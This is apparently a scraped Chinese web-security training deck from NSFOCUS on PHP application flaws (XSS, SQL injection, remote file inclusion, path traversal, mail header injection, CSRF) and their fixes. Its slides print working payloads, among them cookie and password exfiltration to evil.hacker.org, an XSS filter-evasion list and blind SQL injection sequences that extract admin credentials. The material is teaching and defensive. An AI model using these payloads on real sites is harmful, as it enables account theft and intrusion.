register_globals magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
绿盟科技专业服务 代码审计服务 渗透测试服务
<?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, $username, $password); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, $username, $password); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ,[object Object],绿盟科技安全小组使用白盒 (White Box) 测试对源代码进行审计,找出编程缺陷,并提供改进建议及最佳安全编码实践。
<?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ,[object Object]
Pentest Pentest Pentest … 绿盟科技渗透测试小组 (NSFOCUS Pen-test Team) 使用多种技术和方法对客户授权指定的设备进行模拟攻击,验证当前的安全防护措施,找出风险点,提供有价值的安全建议。 ,[object Object],Pen-test Team Web Server Succeed Succeed Succeed
[object Object],[object Object],[object Object]
 
Professional Security Solution Provider Thanks!

Empfohlen

javascript的分层概念 --- 阿当
javascript的分层概念 --- 阿当javascript的分层概念 --- 阿当
javascript的分层概念 --- 阿当裕波 周
 
让我们的页面跑得更快
让我们的页面跑得更快让我们的页面跑得更快
让我们的页面跑得更快li qiang
 
Flash对象在(X)Html中的格式和参数及安全性
Flash对象在(X)Html中的格式和参数及安全性Flash对象在(X)Html中的格式和参数及安全性
Flash对象在(X)Html中的格式和参数及安全性taobao.com
 
如何实现登出按钮
如何实现登出按钮如何实现登出按钮
如何实现登出按钮LI Daobing
 
AngularJS Sharing
AngularJS SharingAngularJS Sharing
AngularJS SharingTom Chen
 
Share xss
Share xssShare xss
Share xsspaitoubing
 
TBAD F2E 2010 review
TBAD F2E 2010 reviewTBAD F2E 2010 review
TBAD F2E 2010 reviewleneli
 
m.taobao.com for iPhone&Android Optimization
m.taobao.com for iPhone&Android Optimizationm.taobao.com for iPhone&Android Optimization
m.taobao.com for iPhone&Android Optimization346682530
 

Empfohlen

javascript的分层概念 --- 阿当
javascript的分层概念 --- 阿当javascript的分层概念 --- 阿当
javascript的分层概念 --- 阿当裕波 周
 
让我们的页面跑得更快
让我们的页面跑得更快让我们的页面跑得更快
让我们的页面跑得更快li qiang
 
Flash对象在(X)Html中的格式和参数及安全性
Flash对象在(X)Html中的格式和参数及安全性Flash对象在(X)Html中的格式和参数及安全性
Flash对象在(X)Html中的格式和参数及安全性taobao.com
 
如何实现登出按钮
如何实现登出按钮如何实现登出按钮
如何实现登出按钮LI Daobing
 
AngularJS Sharing
AngularJS SharingAngularJS Sharing
AngularJS SharingTom Chen
 
Share xss
Share xssShare xss
Share xsspaitoubing
 
TBAD F2E 2010 review
TBAD F2E 2010 reviewTBAD F2E 2010 review
TBAD F2E 2010 reviewleneli
 
m.taobao.com for iPhone&Android Optimization
m.taobao.com for iPhone&Android Optimizationm.taobao.com for iPhone&Android Optimization
m.taobao.com for iPhone&Android Optimization346682530
 
Collaboration On Rails
Collaboration On RailsCollaboration On Rails
Collaboration On RailsJesse Cai
 
关于Js的跨域操作
关于Js的跨域操作关于Js的跨域操作
关于Js的跨域操作王 承石
 
揭秘Html5和Css3
揭秘Html5和Css3揭秘Html5和Css3
揭秘Html5和Css3Adam Lu
 
揭秘Html5和Css3 ---- 鲁超伍
揭秘Html5和Css3 ---- 鲁超伍揭秘Html5和Css3 ---- 鲁超伍
揭秘Html5和Css3 ---- 鲁超伍裕波 周
 
Html5css3 go.yeefe.com
Html5css3 go.yeefe.comHtml5css3 go.yeefe.com
Html5css3 go.yeefe.comtellyeefe
 
WEB 安全基础
WEB 安全基础WEB 安全基础
WEB 安全基础xki
 
Struts1+ hibernate3
Struts1+ hibernate3Struts1+ hibernate3
Struts1+ hibernate3edanwade
 
YUI ─ 阿大
YUI ─ 阿大YUI ─ 阿大
YUI ─ 阿大taobao.com
 
Ajax Transportation Methods
Ajax Transportation MethodsAjax Transportation Methods
Ajax Transportation Methodsyiditushe
 
Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)旻琦 潘
 
日新培训
日新培训日新培训
日新培训pan quanjin
 
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战xiang.zhaox
 
Introduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingIntroduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingKevin Rohling
 
zend framework in web services
zend framework in web serviceszend framework in web services
zend framework in web services王 承石
 
Ruby程式語言入門導覽
Ruby程式語言入門導覽Ruby程式語言入門導覽
Ruby程式語言入門導覽Mu-Fan Teng
 
Node Web开发实战
Node Web开发实战Node Web开发实战
Node Web开发实战fengmk2
 
Python web开发吐槽
Python web开发吐槽Python web开发吐槽
Python web开发吐槽Felinx Lee
 
Cms and HTML
Cms and HTMLCms and HTML
Cms and HTMLzaiyou
 
Cms and Html
Cms and HtmlCms and Html
Cms and Htmlzaiyou
 
Xsd培训资料
Xsd培训资料Xsd培训资料
Xsd培训资料彦波 叶
 

Weitere ähnliche Inhalte

Ähnlich wie Web安全解决方案V1.0

Collaboration On Rails
Collaboration On RailsCollaboration On Rails
Collaboration On RailsJesse Cai
 
关于Js的跨域操作
关于Js的跨域操作关于Js的跨域操作
关于Js的跨域操作王 承石
 
揭秘Html5和Css3
揭秘Html5和Css3揭秘Html5和Css3
揭秘Html5和Css3Adam Lu
 
揭秘Html5和Css3 ---- 鲁超伍
揭秘Html5和Css3 ---- 鲁超伍揭秘Html5和Css3 ---- 鲁超伍
揭秘Html5和Css3 ---- 鲁超伍裕波 周
 
Html5css3 go.yeefe.com
Html5css3 go.yeefe.comHtml5css3 go.yeefe.com
Html5css3 go.yeefe.comtellyeefe
 
WEB 安全基础
WEB 安全基础WEB 安全基础
WEB 安全基础xki
 
Struts1+ hibernate3
Struts1+ hibernate3Struts1+ hibernate3
Struts1+ hibernate3edanwade
 
YUI ─ 阿大
YUI ─ 阿大YUI ─ 阿大
YUI ─ 阿大taobao.com
 
Ajax Transportation Methods
Ajax Transportation MethodsAjax Transportation Methods
Ajax Transportation Methodsyiditushe
 
Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)旻琦 潘
 
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战xiang.zhaox
 
Introduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingIntroduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingKevin Rohling
 
zend framework in web services
zend framework in web serviceszend framework in web services
zend framework in web services王 承石
 
Ruby程式語言入門導覽
Ruby程式語言入門導覽Ruby程式語言入門導覽
Ruby程式語言入門導覽Mu-Fan Teng
 
Node Web开发实战
Node Web开发实战Node Web开发实战
Node Web开发实战fengmk2
 
Python web开发吐槽
Python web开发吐槽Python web开发吐槽
Python web开发吐槽Felinx Lee
 
Cms and HTML
Cms and HTMLCms and HTML
Cms and HTMLzaiyou
 
Cms and Html
Cms and HtmlCms and Html
Cms and Htmlzaiyou
 
Xsd培训资料
Xsd培训资料Xsd培训资料
Xsd培训资料彦波 叶
 

Ähnlich wie Web安全解决方案V1.0 (20)

Collaboration On Rails
Collaboration On RailsCollaboration On Rails
Collaboration On Rails
 
关于Js的跨域操作
关于Js的跨域操作关于Js的跨域操作
关于Js的跨域操作
 
揭秘Html5和Css3
揭秘Html5和Css3揭秘Html5和Css3
揭秘Html5和Css3
 
揭秘Html5和Css3 ---- 鲁超伍
揭秘Html5和Css3 ---- 鲁超伍揭秘Html5和Css3 ---- 鲁超伍
揭秘Html5和Css3 ---- 鲁超伍
 
Html5css3 go.yeefe.com
Html5css3 go.yeefe.comHtml5css3 go.yeefe.com
Html5css3 go.yeefe.com
 
WEB 安全基础
WEB 安全基础WEB 安全基础
WEB 安全基础
 
Struts1+ hibernate3
Struts1+ hibernate3Struts1+ hibernate3
Struts1+ hibernate3
 
YUI ─ 阿大
YUI ─ 阿大YUI ─ 阿大
YUI ─ 阿大
 
Ajax Transportation Methods
Ajax Transportation MethodsAjax Transportation Methods
Ajax Transportation Methods
 
Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)
 
日新培训
日新培训日新培训
日新培训
 
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战
 
Introduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingIntroduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin Rohling
 
zend framework in web services
zend framework in web serviceszend framework in web services
zend framework in web services
 
Ruby程式語言入門導覽
Ruby程式語言入門導覽Ruby程式語言入門導覽
Ruby程式語言入門導覽
 
Node Web开发实战
Node Web开发实战Node Web开发实战
Node Web开发实战
 
Python web开发吐槽
Python web开发吐槽Python web开发吐槽
Python web开发吐槽
 
Cms and HTML
Cms and HTMLCms and HTML
Cms and HTML
 
Cms and Html
Cms and HtmlCms and Html
Cms and Html
 
Xsd培训资料
Xsd培训资料Xsd培训资料
Xsd培训资料
 

Web安全解决方案V1.0

  • 1. Penetration test Software developer Security analyst Security consultation Whatever
  • 2. 跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
  • 4.  
  • 5. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 6. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 7. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 8. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 9. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 10. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
  • 11. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
  • 12. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
  • 13. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
  • 14. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
  • 15. … <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=&quot;http://evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot;&quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22. function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,'&#39;',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot;&quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot;&quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
  • 23.
  • 24. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器    
  • 25.
  • 26.
  • 27.
  • 28. ‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
  • 29. <input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=&quot;javascript:danger()&quot;>...
  • 31. <meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
  • 32. <body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
  • 34. <object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
  • 35. [IE] <div style=&quot;behaviour: url( [link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( [link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [C0][BC]script>[code][C0][BC]/script> <a href=&quot; javas&#99;ript&#35;[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <s&#99;ript>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
  • 36. Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
  • 37. <?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot;&quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
  • 38. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
  • 39. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
  • 40. $_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
  • 41.  
  • 43.  
  • 44.
  • 45. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
  • 46.
  • 47.
  • 48. select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
  • 49.
  • 50. update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
  • 51.
  • 52. Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
  • 53.
  • 54. 1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
  • 55. Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
  • 56. Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
  • 57. Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
  • 58. 1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
  • 59. Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
  • 60. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
  • 61. Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
  • 62. Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
  • 63. Get /query.php?name= -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:oot.ini
  • 64. 合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
  • 65.
  • 66. < > & ‘ “ + ; {Whitespace} % / # Danger !
  • 67. addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url_fopen open_basedir disable_functions 注:解决方案少了,需要更多的时间去完成… …
  • 69.  
  • 70. Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. ...
  • 71. <?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt
  • 72. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php var_dump(get_defined_vars()); die(); ?>
  • 73. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php print &quot;Guess user & password demo&quot;; include('http://evil.hacker.org/userGuesses.php'); foreach($userGuesses as $user => $password) { $connection = @mysql_connect('localhost', $user, $password); if ($connection) { print &quot;Success with username: $user. Using password: $password&quot;; } } ?>
  • 74.
  • 75. Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success Post file=passwd Success Post…
  • 76. <?php // 从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfile&quot;; unlink (&quot;$homedir/$userfile&quot;); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php // 删除硬盘中任何 PHP 有访问权限的文件 $ file_to_delete = $_GET[‘file’]; $username = &quot;../etc/&quot;; $homedir = &quot;/home/../etc/&quot;; $file_to_delete = &quot;passwd&quot;; unlink (&quot;/home/../etc/passwd&quot;); echo &quot;/home/../etc/passwd has been deleted!&quot;; ?> Get /del.php?user=../etc&file=passwd
  • 77.
  • 78.
  • 79. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] POST [email_address]
  • 80. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] … POST fake@example.orgBcc:evil@example.comReply-To:evil2@example.com
  • 81.
  • 83.  
  • 84. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户访问网站 4. 互联网用户点击主题 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 192.168.1.10 6. 执行危险的操作 cookies 信任域 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 login Webpage+cookies evil
  • 85.
  • 87. Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $conf['prefs']['params']['phptype'] = 'mysql'; $conf['prefs']['params']['hostspec'] = 'foo.bar'; $conf['prefs']['params']['username'] = 'root'; $conf['prefs']['params']['password'] = 'blabla'; $conf['prefs']['params']['database'] = 'horde'; $conf['prefs']['params']['table'] = 'horde_prefs'; ...
  • 88.
  • 89.
  • 90. php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_basedir: On displays_errors = off log_errors = on error_log = /var/log/php.log register_globals = off session.use_trans_sid = 0 open_basedir = /servers/www/foo.bar/ expose_php = off Must
  • 92. Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php 用户: 密码: 确定 取消 Get /script.php?authorized=1 Success login in…
  • 93.
  • 94.
  • 95.
  • 97. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,1,1)='a') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 密码是 admin@#$%! 4. 探测密码 Attacker Web Server TRUE FALSE
  • 98. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)=‘1') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 HASH 值 120a1b2649c88aef29edd2ffd7359d73 4. 探测密码 Attacker Web Server TRUE FALSE
